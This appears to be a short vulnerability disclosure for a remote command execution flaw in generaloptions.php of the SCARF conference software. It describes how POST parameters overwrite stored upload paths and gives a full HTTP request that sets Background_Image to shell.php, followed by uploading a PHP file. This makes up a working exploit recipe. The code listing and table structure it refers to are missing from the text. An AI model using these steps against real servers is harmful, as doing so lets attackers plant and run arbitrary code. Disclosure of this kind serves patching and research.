generaloptions.php in Paul Tarjan Stanford Conference And Research Forum (SCARF) before 20070227 exists a remote command execution vulnerability.
In generaloptions.php,
The fifth line will modify the data in the options table in the database according to the key value entered in the POST method in the HTTP request. The options table structure in the database is as follows:
Here you can modify any value field in the options table, In line 11, traverse each uploaded file, query the corresponding value value in the options table according to $name, and then call the move_uploaded_file function to move the uploaded temporary file to the path corresponding to the value value. First enter Background Image as shell.php in post mode.
1 2 3 4 5 6 7 8 9 10 11
POST /scarf/generaloptions.php HTTP/1.1 Host: 192.168.59.182 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 33
Background_Image=shell.php&submit
Then upload the file whose content is <?php phpinfo();?>
